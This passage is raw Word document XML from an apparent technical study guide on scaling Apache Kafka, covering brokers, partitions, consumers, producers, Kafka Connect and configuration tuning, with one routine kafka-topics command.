          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>This interaction ensures Kafka's power as a highly scalable and fault-tolerant distributed event streaming platform used in many real-time data processing and event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5494E86A" w14:textId="1240B695" w:rsidR="00603C66" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="005C743A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="467D8DD4">
          <v:rect id="_x0000_i3073" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3666BB" w14:textId="7EFAE004" w:rsidR="002D75F3" w:rsidRPr="00CE4B95" w:rsidRDefault="00797A8F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="762" w:name="_Toc196308242"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How to scale up Kafka</w:t>
      </w:r>
      <w:r w:rsidR="002D75F3" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="762"/>
    </w:p>
    <w:p w14:paraId="23987BEE" w14:textId="7CA5E454" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00C243D0">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scaling </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> efficiently is crucial when handling high throughput, large amounts of data, and ensuring high availability. Kafka provides several strategies to scale, both horizontally and vertically, based on your use case and infrastructure requirements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD70DEA" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scaling Kafka: Key Strategies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743D832D" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scale Kafka Brokers Horizontally (Increase Brokers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DE45E3"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Add more brokers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to the Kafka cluster to distribute the load and improve availability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482C0F13"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t xml:space="preserve">Kafka uses </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitioning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to distribute data across brokers, so adding more brokers helps distribute the data more evenly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4B1E3F"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t>Brokers also replicate data, so adding more brokers ensures better fault tolerance and data redundancy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25D448A1" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF317FC"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t>Add new brokers to the cluster.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EC140A"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t xml:space="preserve">Update </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>server.properties</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each new broker (e.g., broker.id, listeners, log.dirs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C96FEA"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lastRenderedPageBreak/>
        <w:t>Rebalance partitions (distribute data evenly across brokers) using the Kafka partition reassignment tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D74B43" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Increase Partitions for Topics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F085B"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t xml:space="preserve">Kafka scales by dividing data into </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can be distributed across multiple brokers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA05BAF"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t>Increasing the number of partitions allows for better parallelism and higher throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA0D23"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t>Each partition is handled by a single broker, and more partitions mean more consumers can read in parallel, thus improving scalability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1406B2E9" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600A5B27"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t>Increase the partition count for a specific topic using the kafka-topics command (Note: this can only increase the number of partitions, not decrease).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0857BE17" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29242072" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CopyEdit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FD6FB5" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>kafka-topics.sh --alter --topic &lt;topic-name&gt; --partitions &lt;new-partition-count&gt; --bootstrap-server &lt;broker&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB358BB"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t>You can monitor the partition distribution across brokers and rebalance them if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5FDFF1" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scale Consumers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321EEA82"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t xml:space="preserve">Kafka supports </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>horizontal scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for consumers. You can add more </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer instances</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>consumer group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to handle more partitions in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67173B6A"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t>Each consumer in the group reads from one or more partitions. More consumers allow better load balancing and parallel processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014F4893" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599FD491"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t>Increase the number of consumers in the consumer group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AA9C1C"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t>Ensure that there are enough partitions for each consumer to consume from. Kafka allows multiple consumers to consume data from separate partitions in parallel, but the number of consumers should not exceed the number of partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2333D6E2" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Scale Kafka Producers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C7677B"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t xml:space="preserve">Kafka producers can handle high throughput by making use of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>asynchronous writes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batching</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. As more producers are added, they can write data in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD9A92E"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t xml:space="preserve">Tuning the producer configurations (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>batch.size</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linger.ms</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acks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) can help scale up production throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3C3F34" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091" w:rsidP="00866091">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21515A2D"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t>Optimize producer configurations for high throughput and low latency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FD313C"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t>Distribute load by having multiple producers send messages to different partitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456B02D" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Kafka Connect for Horizontal Scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB17EF8"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kafka Connect</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a framework to scale </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data integration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with external systems (e.g., databases, file systems, etc.). You can use Kafka Connect to horizontally scale the ingestion and extraction of data to and from Kafka.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4060DB04"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t xml:space="preserve">Kafka Connect has the concept of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>worker nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which can be scaled horizontally to increase the number of connectors handling the data flow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF0A15" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Tune Kafka's Configuration for Scalability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F2BB77"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t>Kafka has many configuration options that can be tuned to increase throughput and reduce latency. Common configurations to tune for scaling include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EBD64" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>log.segment.bytes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Adjust the segment size of Kafka logs for faster I/O operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28847428" w14:textId="77777777" w:rsidR="00866091" w:rsidRPr="00CE4B95" w:rsidRDefault="00866091">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="230"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
